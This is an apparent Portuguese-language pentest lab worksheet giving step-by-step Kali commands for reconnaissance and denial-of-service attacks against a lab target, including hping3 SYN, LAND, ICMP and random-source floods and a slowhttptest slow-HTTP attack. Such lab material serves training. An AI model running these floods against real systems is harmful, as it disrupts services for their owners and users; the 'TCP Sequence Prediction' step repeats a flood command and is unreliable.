Você está na página 1de 4

Pentest StEp by sTeP

03
PLANO DE ATIVIDADES: REALIZAR ATAQUE DE NEGAÇÃO DE SERVIÇO

Descrição: Os ataques de rede distribuídos muitas vezes são chamados de ataques de negação
de serviço distribuído (DDoS). Esse tipo de ataque aproveita os limites de capacidade específicos
que se aplicam a todos os recursos de rede, como a infraestrutura que viabiliza o site de uma
empresa. O ataque DDoS envia múltiplas solicitações para o recurso Web invadido com o
objetivo de exceder a capacidade que o site tem de lidar com diversas solicitações, impedindo
seu funcionamento correto.

VM’s a utilizar: KALI E WEBSITEXR00T.

Software e/ou serviço: HPING3, SLOWHTTPTESTT.

1. Utilizar o netdiscover.

kali@kali:~ # sudo netdiscover -i eth1

2. Utilizar o nmap.

kali@kali:~ # nmap 10.10.10.10

3. Utilizar ping.

kali@kali:~ # ping 10.10.10.10

4. Utilizar tshark para analisar o tráfego na rede que tenha o alvo como origem.

kali@kali:~ # tshark -i eth1 -f “src 10.10.10.10”


Pentest StEp by sTeP

03
5. Utilizar tshark para analisar o tráfego na rede que tenha o alvo como destino.

kali@kali:~ # tshark -i eth1 -f “dst 10.10.10.10”

6. Utilizar hping3 para testar ports abertos no alvo.

kali@kali:~ # sudo hping3 -S --scan 1-1000 10.10.10.10

7. Utilizar hping3 para testar ports abertos no alvo.

kali@kali:~ # sudo hping3 -S --scan 22,23,80 10.10.10.10

8. Utilizar hping3 para efetuar ataque SYN flood.

kali@kali:~ # sudo hping3 -S -p 80 10.10.10.10 --flood

Nota: SYN flood também é conhecido como ataque semi-aberto, ou seja o invasor envia várias
solicitações de conexão para realizar o ataque distribuído de negação de serviço.

9. Utilizar tshark para analisar o tráfego na rede que tenha o alvo como origem ou
destino, sempre que julgar necessário.

kali@kali:~ # tshark -i eth1 “host 10.10.10.10”


Pentest StEp by sTeP

03
10. Utilizar hping3 para efetuar ataque LAND.

kali@kali:~ # sudo hping3 -S -p 80 10.10.10.10 -a 10.10.10.10

Nota: Este é um tipo de ataque DoS (Denial of Service) no qual um pacote é enviado para uma
máquina de destino com o mesmo endereço do invasor.

11. Utilizar hping3 para efetuar ataque SMURF.

kali@kali:~ # sudo hping3 --icmp --flood 10.10.10.10 -a 10.10.10.10

Nota: Este é um tipo de ataque DDoS no qual o endereço de origem falsificado envia uma
grande quantidade de pacotes ICMP para o endereço de destino. Utiliza um endereço de
vítima como um endereço de origem para enviar/difundir a solicitação de ping ICMP múltipla.

12. Utilizar hping3 para efetuar ataque RANDOM SOURCE.

kali@kali:~ # sudo hping3 -S -p 80 10.10.10.10 --rand-source

Nota: Neste ataque, o invasor pode enviar vários pacotes aleatórios com diferentes endereços
de origem para a máquina de destino, o que pode causar um ataque DDoS. É difícil identificar
o endereço de origem real após a ocorrência de um incidente.

13. Utilizar hping3, indicando a porta 1234 como porta de cliente e recurso a FLAG FIN.

kali@kali:~ # sudo hping3 -p 80 -s 1234 -F 10.10.10.10

14. Utilizar hping3, indicando a porta 1234 como porta de cliente e recurso a FLAG ACK.

kali@kali:~ # sudo hping3 -p 80 -s 1234 -A 10.10.10.10


Pentest StEp by sTeP

03
15. Utilizar hping3 para efetuar ataque TCP Sequence Predicition.

kali@kali:~ # sudo hping3 -S -p 80 10.10.10.10 --random-source

Nota: Quando um pacote é enviado ou recebido do cliente para o servidor, geralmente cada
pacote contém um número de sequência que ajuda a manter o rastreamento dos pacotes de
dados recebidos e reconhecidos. O objetivo deste ataque é prever o número de sequência
usado para identificar os pacotes numa conexão TCP, que pode ser usado para falsificar
pacotes.

16. Instalar slowhttptest.

kali@kali:~ # apt-get install slowhttptest

17. Utilizar slowhttptest.

kali@kali:~ # slowhttptest -H -c 2000 -g -o output -i 10 -r 300 -t GET -u


http://10.10.10.10 -x 24 -p 3

-H modo de funcionamento default, -c conexões, -g estatística, -o ficheiro, -i intervalo em


segundos entre headers, -r taxa de ligações por segundo, -t utiliza GET em default, -u endereço
(por exemplo http://ip), -x máximo de tamanho da informação enviada, -p espera pela
resposta http.

18. Ler ficheiro html.

kali@kali:~ # firefox output.html

Você também pode gostar